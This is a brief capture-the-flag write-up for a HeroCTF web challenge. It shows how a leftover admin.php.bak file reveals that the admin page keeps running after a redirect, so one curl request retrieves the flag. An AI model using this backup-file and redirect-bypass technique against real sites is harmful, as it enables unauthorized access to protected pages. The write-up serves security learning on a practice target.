Posted on April 26, 2021

You Should Die - HeroCTF.fr

You will need

  • Web browser
  • Curl command


We go to the address given to us - http://chall1.heroctf.fr:9000/. Here, if we open DevTools, we can find an interesting comment inside the body element.

<body id="page-top">
      For developper :
          Do not forget to remove admin.php.bak !
      Security Team

We have got the information that admin.php.bak is not removed, so we go there, and look at how an admin.php code looks like - http://chall1.heroctf.fr:9000/admin.php.bak


if (session_status() == PHP_SESSION_NONE) {

if (!(isset($_SESSION["logged"]) && $_SESSION["logged"] === true)) {
    header("Location: /index.php?error=You are not admin !");

echo "Flag : " . getenv("FLAG_MARK3TING");

Here we can see that flag can be accessed under the /admin.php. Code checks if we are logged in an if we are not it redirects us to /index.php. Redirect is a key word here, because we can fetch this address with curl, which ignores Location header.

$ curl http://chall1.heroctf.fr:9000/admin.php
Flag : Hero{r3d1r3c710n_c4n_b3_d4n63r0u5_57395379}


​​ Hero{r3d1r3c710n_c4n_b3_d4n63r0u5_57395379}



CC BY 4.0 WaletSec + mble